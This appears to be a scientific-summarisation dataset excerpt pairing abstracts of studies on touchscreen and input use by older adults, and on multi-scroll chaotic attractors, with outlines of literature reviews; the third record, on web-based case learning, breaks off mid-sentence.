Moreover, we analyze users' hand tremor profile and its relationship to typing behavior. Our main goal is to inform future designs of touchscreen keyboards for elderly people. To this end, we asked 15 users to enter text under two device conditions (mobile and tablet) and measured their performance, both speed- and accuracy-wise. Additionally, we thoroughly analyze different types of errors (insertions, substitutions, and omissions) looking at touch input features and their main causes. Results show that omissions are the most common error type, mainly due to cognitive errors, followed by substitutions and insertions. While tablet devices can compensate for about 9% of typing errors, omissions are similar across conditions. Measured hand tremor largely correlates with text-entry errors, suggesting that it should be approached to improve input accuracy. Finally, we assess the effect of simple touch models and provide implications to design. --- paper_title: Design and Development of a Mobile Medical Application for the Management of Chronic Diseases: Methods of Improved Data Input for Older People paper_content: The application of already widely available mobile phones would provide medical professionals with an additional possibility of outpatient care, which may reduce medical cost at the same time as providing support to elderly people suffering from chronic diseases, such as diabetes and hypertension. To facilitate this, it is essential to apply user centered development methodologies to counteract opposition due to the technological inexperience of the elderly. In this paper, we describe the design and development of a mobile medical application to help deal with chronic diseases in a home environment. The application is called MyMobileDoc and includes a graphical user interface for patients to enter medical data including blood pressure; blood glucose levels; etc. Although we are aware that sensor devices are being marketed to measure this data, subjective data, for example, pain intensity and contentment level must be manually input. We included 15 patients aged from 36 to 84 (mean age 65) and 4 nurses aged from 20 to 33 (mean age 26) in several of our user centered development cycles. We concentrated on three different possibilities for number input. We demonstrate the function of this interface, its applicability and the importance of patient education. Our aim is to stimulate incidental learning, enhance motivation, increase comprehension and thus acceptance. --- paper_title: Tap or touch?: pen-based selection accuracy for the young and old paper_content: The effect of the decline in cognitive, perceptive, and motor abilities on older adults' performance with input devices has been well documented in several experiments. None of these experiments, however, have provided information on the challenges faced by older adults when using pens to interact with handheld computers. To address this need, we conducted a study to learn about the performance of older adults in simple pen-based tasks with handheld computers. The study compared the performance of twenty 18-22 year olds, twenty 50-64 year olds, and twenty 65-84 year olds. We found that for the most part, older adults were able to complete tasks accurately. An exception occurred with the low accuracy rates achieved by 65-84 year old participants when tapping on targets of the same size as the standard radio buttons, checkboxes, and icons on the PocketPC. An alternative selection technique we refer to as "touch" enabled 65-84 year olds to select targets more accurately. This technique did not negatively affect the performance of the other participants. If tapping to select, making standard-sized targets 50 percent larger provided 65-84 year olds with similar advantages to switching to "touch" interactions. The results suggest that "touch" interactions need to be further explored to understand whether they will work in more realistic situations. --- paper_title: Text entry on handheld computers by older users paper_content: Small pocket computers offer great potential in workplaces where mobility is needed to collect data or access reference information while carrying out tasks such as maintenance or customer support. This paper reports on three studies examining the hypothesis that data entry by older workers is easier when the pocket computer has a physical keyboard, albeit a small one, rather than a touchscreen keyboard. Using a counter-balanced, within-subjects design the accuracy and speed with which adults over 55 years of age could make or modify short text entries was measured for both kinds of pocket computer. The keyboard computer was the Hewlett Packard 360LX (HP), but the touch-screen computers varied across studies (experiment 1: Apple Newton™ and PalmPilot™; experiment 2: Philips Nino™; experiment 3: Casio E10™). All studies showed significant decrements in accuracy and speed when entering text via the touch-screen. Across studies, most participants preferred using the HP's small physical keyboard. Even after a... --- paper_title: Lowering elderly Japanese users’ resistance towards computers by using touchscreen technology paper_content: The standard qwerty keyboard is considered to be a major source of reluctance towards computer technology use by Japanese elderly, due to their limited experience with typewriters and the high cognitive demand involved in inputting Japanese characters. The touchscreen enables users to enter Japanese characters more directly and is expected to moderate this resistance. An e-mail terminal with a touchscreen was developed and compared with the same terminal using a standard keyboard and mouse. Computer attitudes and subjective evaluations of 32 older adults were measured. The results showed that the anxiety factor of computer attitudes declined significantly in the touchscreen condition. --- paper_title: Use of Computer Input Devices by Older Adults paper_content: A sample of 85 seniors was given experience (10 trials) playing two computer tasks using four input devices (touch screen, enlarged mouse [EZ Ball], mouse, and touch pad). Performance measures assessed both accuracy and time to complete components of the game for these devices. As well, participants completed a survey where they evaluated each of the devices. Seniors also completed a series of measures assessing visual memory, visual perception, motor coordination, and motor dexterity. Overall, previous experience with computers had a significant impact on the type of device that yielded the highest accuracy and speed performance, with different devices yielding better performance for novices versus experienced computer users. Regression analyses indicated that the mouse was the most demanding device in terms of the cognitive and motor-demand measures. Discussion centers on the relative benefits and perceptions regarding these devices among senior populations. --- paper_title: Investigating familiar interactions to help older adults learn computer applications more easily paper_content: Many older adults wish to gain competence in using a computer, but many application interfaces are perceived as complex and difficult to use, deterring potential users from investing the time to learn them. Hence, this study looks at the potential of 'familiar' interface design which builds upon users' knowledge of real world interactions, and applies existing skills to a new domain. Tools are provided in the form of familiar visual objects, and manipulated like real-world counterparts, rather than with buttons, icons and menus found in classic WIMP interfaces. ::: ::: This paper describes the formative evaluation of computer interactions that are based upon familiar real world tasks, which support multitouch interaction, involves few buttons and icons, no menus, no right-clicks or double-clicks and no dialogs. Using an example of an email client to test the principles of using "familiarity", the initial feedback was very encouraging, with 3 of the 4 participants being able to undertake some of the basic email tasks with no prior training and little or no help. The feedback has informed a number of refinements of the design principles, such as providing clearer affordance for visual objects. A full study is currently underway. --- paper_title: Comparison between single-touch and multi-touch interaction for older people paper_content: This paper describes a study exploring the multi-touch interaction for older adults. The aim of this experiment was to check the relevance of this interaction versus single-touch interaction to realize object manipulation tasks: move, rotate and zoom. For each task, the user had to manipulate a rectangle and superimpose it to a picture frame. Our study shows that adults and principally older adults had more difficulties to realize these tasks for multi-touch interaction than for single-touch interaction. --- paper_title: Investigation of Input Devices for the Age-differentiated Design of Human-Computer Interaction: paper_content: Demographic change demands new concepts for the support of computer work by aging employees. In particular, computer interaction presents a barrier due to a lack of experience and age-specific changes in performance. This article presents a study in which different input devices (mouse, touch screen and eye-gaze input) were analyzed regarding their usability and according to age diversity. Furthermore, different Hybrid Interfaces that combine eye-gaze input with additional input devices were investigated. --- paper_title: A Study of Pointing Performance of Elderly Users on Smartphones paper_content: The number of global smartphone users is rapidly increasing. However, the proportion of elderly persons using smartphones is lower than that of other age groups because they feel it is difficult to use touch screens. There have only been a few studies about usability and elderly smartphone users or designs for them. Based on this background, we studied the pointing action of elderly users, which is a basic skill required to use touch screens on smartphones. We reviewed previous works to determine specific research methods and categorized them into three groups: (a) effect of target size and spacing on touch screen pointing performance, (b) effect of age on pointing performance, and (c) feedback of touch screens. To investigate the touch screen pointing performance of elderly, we conducted two experiments. In the first experiment, 3 target sizes (5 mm, 8 mm, and 12 mm) and 2 target spacings (1 mm, 3 mm) were evaluated. Adding to that, we analyzed whether touch screen pointing performance is dependent on th... --- paper_title: Evaluating swabbing: a touchscreen input method for elderly users with tremor paper_content: Elderly users suffering from hand tremor have difficulties interacting with touchscreens because of finger oscillation. It has been previously observed that sliding one's finger across the screen may help reduce this oscillation. In this work, we empirically confirm this advantage by (1) measuring finger oscillation during different actions and (2) comparing error rate and user satisfaction between traditional tapping and swabbing in which the user slides his finger towards a target on a screen edge to select it. We found that oscillation is generally reduced during sliding. Also, compared to tapping, swabbing resulted in improved error rates and user satisfaction. We believe that swabbing will make touchscreens more accessible to senior users with tremor. --- paper_title: Age-related differences in performance with touchscreens compared to traditional mouse input paper_content: Despite the apparent popularity of touchscreens for older adults, little is known about the psychomotor performance of these devices. We compared performance between older adults and younger adults on four desktop and touchscreen tasks: pointing, dragging, crossing and steering. On the touchscreen, we also examined pinch-to-zoom. Our results show that while older adults were significantly slower than younger adults in general, the touchscreen reduced this performance gap relative to the desktop and mouse. Indeed, the touchscreen resulted in a significant movement time reduction of 35% over the mouse for older adults, compared to only 16% for younger adults. Error rates also decreased. --- paper_title: The elderly interacting with a digital agenda through an RFID pen and a touch screen paper_content: Ambient Assisted Living (AAL) aims to enhance quality of life of elder and impaired people. Thanks to the advances in Information and Communication Technologies (ICT), it is now possible not only to support new home services to improve their quality of life, but also to provide them with more natural, simple and multimodal interaction styles. It enables introducing new better-suited interaction styles for performing tasks according to user need, abilities and the usage conditions. In this paper, a digital agenda application is described and tested by a group of elderly users. This customized personal agenda allows elders to create agenda entries, to view calendar entries and a person's telephone without typing any letter or number. Through observation and the capture of data we studied how six participants (ages from 66 to 74) interacted with the personal agenda through a touch screen and an RFID-based interface. The RFID interaction consisted of a sheet-like physical object' the RFID board', and a pen-like object 'the IDBlue pen' that the users used to choose the desired option in the board. Beside the users' satisfaction, interesting results have been found that make us aware of valuable information to enhance their interaction with the digital world, as well as, their quality of life. Moreover, it is shown how a pen-like object and a sheet-like one can be used by the elderly to interact with the digital world. --- paper_title: Gestural interfaces for elderly users: Help or hindrance paper_content: In this paper we investigate whether finger gesture input is a suitable input method, especially for older users (60+) with respect to age-related changes in sensory, cognitive and motor abilities. We present a study in which we compare a group of older users to a younger user group on a set of 42 different finger gestures on measures of speed and accuracy. The size and the complexity of the gestures varied systematically in order to find out how these factors interact with age on gesture performance. The results showed that older users are a little slower, but not necessarily less accurate than younger users, even on smaller screen sizes, and across different levels of gesture complexity. This indicates that gesture-based interaction could be a suitable input method for older adults. At least not a hindrance - maybe even a help. --- paper_title: Usability evaluation of numeric entry tasks on keypad type and age. paper_content: Abstract This study investigated the effects of age and two keypad types (physical keypad and touch-screen one) on the usability of numeric entry tasks. Twenty four subjects (12 young adults 23–33 years old and 12 older adults 65–76 years old) performed three types of entry tasks: 4-digit, 4-digit of password type, and 11-digit. The dependent variables for the performance were mean entry time per unit stroke and error rate. Subjective ratings for ease of use of each keypad type were collected after the experiment. The mean entry time per unit stroke of the young adults was significantly smaller than that of the older adults. The older adults had significantly different mean entry times per unit stroke on the two keypad types. The error rates between young and older adults were significantly different for the touch-screen keypad. The subjective ratings showed that the participants preferred the touch-screen keypad to the physical keypad. The results showed that the older adults preferred the touch-screen keypad and could operate more quickly, and that tactile feedback is needed for the touch-screen keypad to increase input accuracy. The results of this study can be applied when designing different information technology products to input numbers using one hand. Relevance to industry Touch-screen technology is increasingly used in ticketing Kiosks used in public places such as airports, stations or theaters, and in automated teller machines (ATMs) and cash dispensers (CDs). This paper can be applied to design these products or systems, particularly considering usability improvements for older adults. --- paper_title: Elderly text-entry performance on touchscreens paper_content: Touchscreen devices have become increasingly popular. Yet they lack of tactile feedback and motor stability, making it difficult effectively typing on virtual keyboards. This is even worse for elderly users and their declining motor abilities, particularly hand tremor. In this paper we examine text-entry performance and typing patterns of elderly users on touch-based devices. Moreover, we analyze users' hand tremor profile and its relationship to typing behavior. Our main goal is to inform future designs of touchscreen keyboards for elderly people. To this end, we asked 15 users to enter text under two device conditions (mobile and tablet) and measured their performance, both speed- and accuracy-wise. Additionally, we thoroughly analyze different types of errors (insertions, substitutions, and omissions) looking at touch input features and their main causes. Results show that omissions are the most common error type, mainly due to cognitive errors, followed by substitutions and insertions. While tablet devices can compensate for about 9% of typing errors, omissions are similar across conditions. Measured hand tremor largely correlates with text-entry errors, suggesting that it should be approached to improve input accuracy. Finally, we assess the effect of simple touch models and provide implications to design. --- paper_title: Design and Development of a Mobile Medical Application for the Management of Chronic Diseases: Methods of Improved Data Input for Older People paper_content: The application of already widely available mobile phones would provide medical professionals with an additional possibility of outpatient care, which may reduce medical cost at the same time as providing support to elderly people suffering from chronic diseases, such as diabetes and hypertension. To facilitate this, it is essential to apply user centered development methodologies to counteract opposition due to the technological inexperience of the elderly. In this paper, we describe the design and development of a mobile medical application to help deal with chronic diseases in a home environment. The application is called MyMobileDoc and includes a graphical user interface for patients to enter medical data including blood pressure; blood glucose levels; etc. Although we are aware that sensor devices are being marketed to measure this data, subjective data, for example, pain intensity and contentment level must be manually input. We included 15 patients aged from 36 to 84 (mean age 65) and 4 nurses aged from 20 to 33 (mean age 26) in several of our user centered development cycles. We concentrated on three different possibilities for number input. We demonstrate the function of this interface, its applicability and the importance of patient education. Our aim is to stimulate incidental learning, enhance motivation, increase comprehension and thus acceptance. --- paper_title: Tap or touch?: pen-based selection accuracy for the young and old paper_content: The effect of the decline in cognitive, perceptive, and motor abilities on older adults' performance with input devices has been well documented in several experiments. None of these experiments, however, have provided information on the challenges faced by older adults when using pens to interact with handheld computers. To address this need, we conducted a study to learn about the performance of older adults in simple pen-based tasks with handheld computers. The study compared the performance of twenty 18-22 year olds, twenty 50-64 year olds, and twenty 65-84 year olds. We found that for the most part, older adults were able to complete tasks accurately. An exception occurred with the low accuracy rates achieved by 65-84 year old participants when tapping on targets of the same size as the standard radio buttons, checkboxes, and icons on the PocketPC. An alternative selection technique we refer to as "touch" enabled 65-84 year olds to select targets more accurately. This technique did not negatively affect the performance of the other participants. If tapping to select, making standard-sized targets 50 percent larger provided 65-84 year olds with similar advantages to switching to "touch" interactions. The results suggest that "touch" interactions need to be further explored to understand whether they will work in more realistic situations. --- paper_title: Exploring the accessibility and appeal of surface computing for older adult health care support paper_content: This paper examines accessibility issues of surface computing with older adults and explores the appeal of surface computing for health care support. We present results from a study involving 20 older adults (age 60 to 88) performing gesture-based interactions on a multitouch surface. Older adults were able to successfully perform all actions on the surface computer, but some gestures that required two fingers (resize) and fine motor movement (rotate) were problematic. Ratings for ease of use and ease of performing each action as well as time required to figure out an action were similar to that of younger adults. Older adults reported that the surface computer was less intimidating, less frustrating, and less overwhelming than a traditional computer. The idea of using a surface computer for health care support was well-received by participants. We conclude with a discussion of design issues involving surface computing for older adults and use of this technology for health care. --- paper_title: Text entry on handheld computers by older users paper_content: Small pocket computers offer great potential in workplaces where mobility is needed to collect data or access reference information while carrying out tasks such as maintenance or customer support. This paper reports on three studies examining the hypothesis that data entry by older workers is easier when the pocket computer has a physical keyboard, albeit a small one, rather than a touchscreen keyboard. Using a counter-balanced, within-subjects design the accuracy and speed with which adults over 55 years of age could make or modify short text entries was measured for both kinds of pocket computer. The keyboard computer was the Hewlett Packard 360LX (HP), but the touch-screen computers varied across studies (experiment 1: Apple Newton™ and PalmPilot™; experiment 2: Philips Nino™; experiment 3: Casio E10™). All studies showed significant decrements in accuracy and speed when entering text via the touch-screen. Across studies, most participants preferred using the HP's small physical keyboard. Even after a... --- paper_title: A Study on the Icon Feedback Types of Small Touch Screen for the Elderly paper_content: Small touch screens are widely used in applications such as bank ATMs, point-of-sale terminals, ticket vending machines, facsimiles, and home automation in the daily life. It is intuition-oriented and easy to operate. There are a lot of elements that affect the small screen touch performance. One of the essential parts is icon feedback. However, to merely achieve beautiful icon feedback appearance and create interesting interaction experience, many interface designers ignore the real user needs. It is critical for them to trade off the icon feedback type associated with the different users needs in the touch interaction. This is especially important when the user capability is very limited. This paper described a pilot study for identifying factors that determine the icon feedback usability on small touch screen in four older adult Cognitrone groups since current research aimed mostly at general icon guidelines and recommendations and failed to consider and define the specific needs of small touch screen interfaces for the elderly. In this paper, we presented a concept from the focus on human necessity and use a cognitive assessment tool, which is, Cognitrone test, to measure older adult's attention and concentration capability and learn more about how to evaluate and design suitable small screen icon feedback types. Forty-five elder participants were participated. Each subject was asked to complete a battery of Cognitrone tests and divided into 4 groups. Each subject was also requested to perform a set of `continuous touch' usability tasks on small touch screen and comment on open-ended questions. Results are discussed with respect to the perceptual and cognitive factors that influence older adults in the use of icon feedback on small touch screen. It showed significant associations between icon feedback performance and factors of attention and concentration. However, this interrelation was much stronger for the Group 2 and Group 4, especially for Type B, Type C and Type G. Moreover, consistent with previous research, older participants were less sensitive and required longer time to adapt to the high-detailed icon feedback. These results are discussed in terms of icon feedback design strategies for interface designers. --- paper_title: Slipping and drifting: using older users to uncover pen-based target acquisition difficulties paper_content: This paper presents the results of a study to gather information on the underlying causes of pen -based target acquisition difficulty. In order to observe both simple and complex interaction, two tasks (menu and Fitts' tapping) were used. Thirty-six participants across three age groups (18-54, 54-69, and 70-85) were included to draw out both general shortcomings of targeting, and those difficulties unique to older users. Three primary sources of target acquisition difficulty were identified: slipping off the target, drifting unexpectedly from one menu to the next, and missing a menu selection by selecting the top edge of the item below. Based on these difficulties, we then evolved several designs for improving pen-based target acquisition. An additional finding was that including older users as participants allowed us to uncover pen-interaction deficiencies that we would likely have missed otherwise. --- paper_title: Lowering elderly Japanese users’ resistance towards computers by using touchscreen technology paper_content: The standard qwerty keyboard is considered to be a major source of reluctance towards computer technology use by Japanese elderly, due to their limited experience with typewriters and the high cognitive demand involved in inputting Japanese characters. The touchscreen enables users to enter Japanese characters more directly and is expected to moderate this resistance. An e-mail terminal with a touchscreen was developed and compared with the same terminal using a standard keyboard and mouse. Computer attitudes and subjective evaluations of 32 older adults were measured. The results showed that the anxiety factor of computer attitudes declined significantly in the touchscreen condition. --- paper_title: Design pattern TRABING: touchscreen-based input technique for people affected by intention tremor paper_content: Tremor patients are frequently facing problems when interacting with IT systems and services. They do not reach the same levels of input efficiency and easily become unhappy with a technology they do not perceive as a general asset. Cases of Intention tremor show a significant comparative rise in inaccurate movement towards a real button or virtual buttons on touch screens, as this particular tremor increases its symptoms when approaching a desired physical target. People suffering from this specific tremor have been identified as the target group. This group has been closely investigated and thus, a new input procedure has been developed which may be used on standard touch screens. The new technique enables users, accordingly tremor patients, to fully operate IT-based systems and therefore possess full control over input. Deviations caused by the tremor are compensated with a continuous movement instead of a single targeted move which remains the most difficult task to the user. Also, the screen surface will present a frictional resistance, which significantly hinders tremor symptoms. Input can be identified by the computer system with high accuracy, by means of special heuristics, which support barrier free access beyond the target group. --- paper_title: Elderly User Evaluation of Mobile Touchscreen Interactions paper_content: Smartphones with touchscreen-based interfaces are increasingly used by non-technical groups including the elderly. However, application developers have little understanding of how senior users interact with their products and of how to design senior-friendly interfaces. As an initial study to assess standard mobile touchscreen interfaces for the elderly, we conducted performance measurements and observational evaluations of 20 elderly participants. The tasks included performing basic gestures such as taps, drags, and pinching motions and using basic interactive components such as software keyboards and photo viewers. We found that mobile touchscreens were generally easy for the elderly to use and a week's experience generally improved their proficiency. However, careful observations identified several typical problems that should be addressed in future interfaces. We discuss the implications of our experiments, seeking to provide informal guidelines for application developers to design better interfaces for elderly people. --- paper_title: Use of Computer Input Devices by Older Adults paper_content: A sample of 85 seniors was given experience (10 trials) playing two computer tasks using four input devices (touch screen, enlarged mouse [EZ Ball], mouse, and touch pad). Performance measures assessed both accuracy and time to complete components of the game for these devices. As well, participants completed a survey where they evaluated each of the devices. Seniors also completed a series of measures assessing visual memory, visual perception, motor coordination, and motor dexterity. Overall, previous experience with computers had a significant impact on the type of device that yielded the highest accuracy and speed performance, with different devices yielding better performance for novices versus experienced computer users. Regression analyses indicated that the mouse was the most demanding device in terms of the cognitive and motor-demand measures. Discussion centers on the relative benefits and perceptions regarding these devices among senior populations. --- paper_title: A Study of Pointing Performance of Elderly Users on Smartphones paper_content: The number of global smartphone users is rapidly increasing. However, the proportion of elderly persons using smartphones is lower than that of other age groups because they feel it is difficult to use touch screens. There have only been a few studies about usability and elderly smartphone users or designs for them. Based on this background, we studied the pointing action of elderly users, which is a basic skill required to use touch screens on smartphones. We reviewed previous works to determine specific research methods and categorized them into three groups: (a) effect of target size and spacing on touch screen pointing performance, (b) effect of age on pointing performance, and (c) feedback of touch screens. To investigate the touch screen pointing performance of elderly, we conducted two experiments. In the first experiment, 3 target sizes (5 mm, 8 mm, and 12 mm) and 2 target spacings (1 mm, 3 mm) were evaluated. Adding to that, we analyzed whether touch screen pointing performance is dependent on th... --- paper_title: Evaluating swabbing: a touchscreen input method for elderly users with tremor paper_content: Elderly users suffering from hand tremor have difficulties interacting with touchscreens because of finger oscillation. It has been previously observed that sliding one's finger across the screen may help reduce this oscillation. In this work, we empirically confirm this advantage by (1) measuring finger oscillation during different actions and (2) comparing error rate and user satisfaction between traditional tapping and swabbing in which the user slides his finger towards a target on a screen edge to select it. We found that oscillation is generally reduced during sliding. Also, compared to tapping, swabbing resulted in improved error rates and user satisfaction. We believe that swabbing will make touchscreens more accessible to senior users with tremor. --- paper_title: The elderly interacting with a digital agenda through an RFID pen and a touch screen paper_content: Ambient Assisted Living (AAL) aims to enhance quality of life of elder and impaired people. Thanks to the advances in Information and Communication Technologies (ICT), it is now possible not only to support new home services to improve their quality of life, but also to provide them with more natural, simple and multimodal interaction styles. It enables introducing new better-suited interaction styles for performing tasks according to user need, abilities and the usage conditions. In this paper, a digital agenda application is described and tested by a group of elderly users. This customized personal agenda allows elders to create agenda entries, to view calendar entries and a person's telephone without typing any letter or number. Through observation and the capture of data we studied how six participants (ages from 66 to 74) interacted with the personal agenda through a touch screen and an RFID-based interface. The RFID interaction consisted of a sheet-like physical object' the RFID board', and a pen-like object 'the IDBlue pen' that the users used to choose the desired option in the board. Beside the users' satisfaction, interesting results have been found that make us aware of valuable information to enhance their interaction with the digital world, as well as, their quality of life. Moreover, it is shown how a pen-like object and a sheet-like one can be used by the elderly to interact with the digital world. --- paper_title: Elderly text-entry performance on touchscreens paper_content: Touchscreen devices have become increasingly popular. Yet they lack of tactile feedback and motor stability, making it difficult effectively typing on virtual keyboards. This is even worse for elderly users and their declining motor abilities, particularly hand tremor. In this paper we examine text-entry performance and typing patterns of elderly users on touch-based devices. Moreover, we analyze users' hand tremor profile and its relationship to typing behavior. Our main goal is to inform future designs of touchscreen keyboards for elderly people. To this end, we asked 15 users to enter text under two device conditions (mobile and tablet) and measured their performance, both speed- and accuracy-wise. Additionally, we thoroughly analyze different types of errors (insertions, substitutions, and omissions) looking at touch input features and their main causes. Results show that omissions are the most common error type, mainly due to cognitive errors, followed by substitutions and insertions. While tablet devices can compensate for about 9% of typing errors, omissions are similar across conditions. Measured hand tremor largely correlates with text-entry errors, suggesting that it should be approached to improve input accuracy. Finally, we assess the effect of simple touch models and provide implications to design. --- paper_title: Design and Development of a Mobile Medical Application for the Management of Chronic Diseases: Methods of Improved Data Input for Older People paper_content: The application of already widely available mobile phones would provide medical professionals with an additional possibility of outpatient care, which may reduce medical cost at the same time as providing support to elderly people suffering from chronic diseases, such as diabetes and hypertension. To facilitate this, it is essential to apply user centered development methodologies to counteract opposition due to the technological inexperience of the elderly. In this paper, we describe the design and development of a mobile medical application to help deal with chronic diseases in a home environment. The application is called MyMobileDoc and includes a graphical user interface for patients to enter medical data including blood pressure; blood glucose levels; etc. Although we are aware that sensor devices are being marketed to measure this data, subjective data, for example, pain intensity and contentment level must be manually input. We included 15 patients aged from 36 to 84 (mean age 65) and 4 nurses aged from 20 to 33 (mean age 26) in several of our user centered development cycles. We concentrated on three different possibilities for number input. We demonstrate the function of this interface, its applicability and the importance of patient education. Our aim is to stimulate incidental learning, enhance motivation, increase comprehension and thus acceptance. --- paper_title: A Study on the Icon Feedback Types of Small Touch Screen for the Elderly paper_content: Small touch screens are widely used in applications such as bank ATMs, point-of-sale terminals, ticket vending machines, facsimiles, and home automation in the daily life. It is intuition-oriented and easy to operate. There are a lot of elements that affect the small screen touch performance. One of the essential parts is icon feedback. However, to merely achieve beautiful icon feedback appearance and create interesting interaction experience, many interface designers ignore the real user needs. It is critical for them to trade off the icon feedback type associated with the different users needs in the touch interaction. This is especially important when the user capability is very limited. This paper described a pilot study for identifying factors that determine the icon feedback usability on small touch screen in four older adult Cognitrone groups since current research aimed mostly at general icon guidelines and recommendations and failed to consider and define the specific needs of small touch screen interfaces for the elderly. In this paper, we presented a concept from the focus on human necessity and use a cognitive assessment tool, which is, Cognitrone test, to measure older adult's attention and concentration capability and learn more about how to evaluate and design suitable small screen icon feedback types. Forty-five elder participants were participated. Each subject was asked to complete a battery of Cognitrone tests and divided into 4 groups. Each subject was also requested to perform a set of `continuous touch' usability tasks on small touch screen and comment on open-ended questions. Results are discussed with respect to the perceptual and cognitive factors that influence older adults in the use of icon feedback on small touch screen. It showed significant associations between icon feedback performance and factors of attention and concentration. However, this interrelation was much stronger for the Group 2 and Group 4, especially for Type B, Type C and Type G. Moreover, consistent with previous research, older participants were less sensitive and required longer time to adapt to the high-detailed icon feedback. These results are discussed in terms of icon feedback design strategies for interface designers. --- paper_title: Design pattern TRABING: touchscreen-based input technique for people affected by intention tremor paper_content: Tremor patients are frequently facing problems when interacting with IT systems and services. They do not reach the same levels of input efficiency and easily become unhappy with a technology they do not perceive as a general asset. Cases of Intention tremor show a significant comparative rise in inaccurate movement towards a real button or virtual buttons on touch screens, as this particular tremor increases its symptoms when approaching a desired physical target. People suffering from this specific tremor have been identified as the target group. This group has been closely investigated and thus, a new input procedure has been developed which may be used on standard touch screens. The new technique enables users, accordingly tremor patients, to fully operate IT-based systems and therefore possess full control over input. Deviations caused by the tremor are compensated with a continuous movement instead of a single targeted move which remains the most difficult task to the user. Also, the screen surface will present a frictional resistance, which significantly hinders tremor symptoms. Input can be identified by the computer system with high accuracy, by means of special heuristics, which support barrier free access beyond the target group. --- paper_title: Elderly User Evaluation of Mobile Touchscreen Interactions paper_content: Smartphones with touchscreen-based interfaces are increasingly used by non-technical groups including the elderly. However, application developers have little understanding of how senior users interact with their products and of how to design senior-friendly interfaces. As an initial study to assess standard mobile touchscreen interfaces for the elderly, we conducted performance measurements and observational evaluations of 20 elderly participants. The tasks included performing basic gestures such as taps, drags, and pinching motions and using basic interactive components such as software keyboards and photo viewers. We found that mobile touchscreens were generally easy for the elderly to use and a week's experience generally improved their proficiency. However, careful observations identified several typical problems that should be addressed in future interfaces. We discuss the implications of our experiments, seeking to provide informal guidelines for application developers to design better interfaces for elderly people. ---
Title: Interaction techniques for older adults using touchscreen devices: a literature review Section 1: INTRODUCTION Description 1: Discuss the development of new technologies and their potential benefits for older adults, the usability challenges of traditional input devices, and the aim of this literature review. Section 2: RELATED WORK Description 2: Summarize previous literature reviews and studies concerning touchscreen interaction and older users, highlighting the benefits, challenges, and gaps in current research. Section 3: METHODOLOGY Description 3: Describe the selection criteria for the 24 studies reviewed, including the fields they were sourced from and the focus on touchscreen interaction with older adults. Section 4: Population Description 4: Detail the demographics of the populations studied, including age ranges, previous technology experience, and the types of impairments identified. Section 5: Apparatus Description 5: Provide information on the screen sizes and types of devices used in the studies, as well as their orientation, mounting, and touchscreen technologies. Section 6: Feedback Description 6: Summarize the types of feedback used in the studies, such as visual, audio, and tactile feedback, and their impact on user performance. Section 7: Input techniques Description 7: Discuss the various input techniques evaluated in the studies, including finger versus pen interaction, single touch versus multitouch, and comparisons with other input devices. Section 8: Tasks Description 8: Describe the different types of tasks used in the studies to evaluate touchscreen interaction, categorized into target selection, text or digit input, and gestures of interaction. Section 9: Data collection Description 9: Explain the types of quantitative and qualitative data collected in the studies, including error rates, completion times, subjective questionnaires, and observational data. Section 10: Findings Description 10: Summarize the key findings from the studies, including the effects of various input techniques on older adults' performance, common errors, user preferences, and the impact of feedback. Section 11: Recommendations Description 11: Provide recommendations derived from the studies for designing more ergonomic and user-friendly touchscreen interfaces and interaction techniques for older adults. Section 12: CONCLUSION Description 12: Recap the main insights from the literature review and outline the key parameters to consider when designing touchscreen interaction systems for older adults.
A brief overview of multi-scroll chaotic attractors generation
6
--- paper_title: DIFFERENTIAL EQUATIONS WITH MULTISPIRAL ATTRACTORS paper_content: A system of nonautonomous differential equations having Chua's piecewise-linearity is studied. A brief discussion about equilibrium points and their stability is given. It is also extended to obtain a system showing "multispiral" strange attractors, and some of the fundamental routes to "multispiral chaos" and bifurcation phenomena are demonstrated with various examples. The same work is done for other systems of autonomous or nonautonomous differential equations. This is achieved by modifying Chua's piecewise-linearity in order to have additional segments. The evolution of the dynamics and a mechanism for the development of multispiral strange attractors are discussed. ---
Title: A Brief Overview of Multi-Scroll Chaotic Attractors Generation Section 1: Introduction Description 1: This section provides an overview of the state of research on multi-scroll chaotic attractors and outlines the structure of the paper. Section 2: Piecewise Linear (PWL) Function Approach Description 2: This section introduces the PWL function approach for generating n-scroll chaotic attractors. Section 3: Switching Manifold Method Description 3: This section explains the switching manifold method for creating multi-scroll chaotic attractors. Section 4: Basic-Circuits Approach Description 4: This section discusses the basic-circuits approach used for generating multi-scroll chaotic attractors. Section 5: Other Techniques for Multi-Scroll Chaotic Attractors Generation Description 5: This section provides a brief overview of several other techniques used to generate multi-scroll chaotic attractors. Section 6: Conclusions Description 6: This section summarizes the main points discussed in the paper and offers some outlook on future research directions.
Case-Based Learning on Web in Higher Education: A Review of Empirical Research
8
--- paper_title: Case Study as a Constructivist Pedagogy for Teaching Educational Psychology paper_content: Recent interest and inquiry into constructivism, pedagogical content knowledge, and case study methodology are influencing the content and goals of educational psychology in teacher preparation. The reasons seem clear: The content of educational psychology lends itself to authentic, active, and pragmatic applications of theory to school practices, as well as to investigations of a variety of educational issues, perspectives, and contexts which can be viewed through case study, a constructivist problem-based approach to learning. Widely-used educational psychology texts are including constructivism as a cognitive alternative to behaviorist and information processing views of teaching and learning. Concurrently, case studies are being integrated in educational psychology texts, and a myriad of case texts have appeared with application to educational psychology courses. This article considers the decisions, benefits, and difficulties in teaching educational psychology through a constructivist case study approach. --- paper_title: Assessing Complex Problem-Solving Skills and Knowledge Assembly Using Web-Based Hypermedia Design paper_content: This research project studied the effects of hierarchical versus heterarchical hypermedia structures of web-based case representations on complex problem-solving skills and knowledge assembly in problem-centered learning environments to develop a system or model that informs the design of web-based cases for ill-structured problems across multiple disciplines. Two groups of students were assigned to work through an ill-structured problem, represented hierarchically and heterarchically in a web-based format. A web-based tracking program was deployed to track students' journeys through the hypermedia case designs. Students were observed while interacting with the problem and were interviewed after submitting their case solutions. Results from the tracking program, observations, case solutions, and interview questions will address case design issues, problem-solving issues, and group processes. RESEARCH PROBLEM Several research projects and studies (Booth-Sweeney, 2001; Herreid & Schiller, 2001; Siegel, et al., 2000; Rogers & Erickson, 1998; Gerdes, 1998; Sutyak, Lebeau, & O'Donnell, 1998; Fitzgerald & Semrau, 1996; Jacobson, Maouri, Mishra, & Kolar, 1996) have investigated the use of cases or problems in instruction particularly in relation to case structure (e.g., linear vs. hypertext, narrative vs. conceptual) and problem complexity (e.g., well-defined vs. ill-structured), and the impact of such variables on advanced knowledge acquisition. However to date, there is no explicit framework or instructional model to guide the design of web-based hypermedia cases, particularly for ill-structured problems or learning tasks that require students to engage in complex problem-solving and knowledge transfer. In addition, Grissom and Koschmann (1995) contended that cases or problems that are used as a stimulus for authentic activity are hard to come by in disciplines other 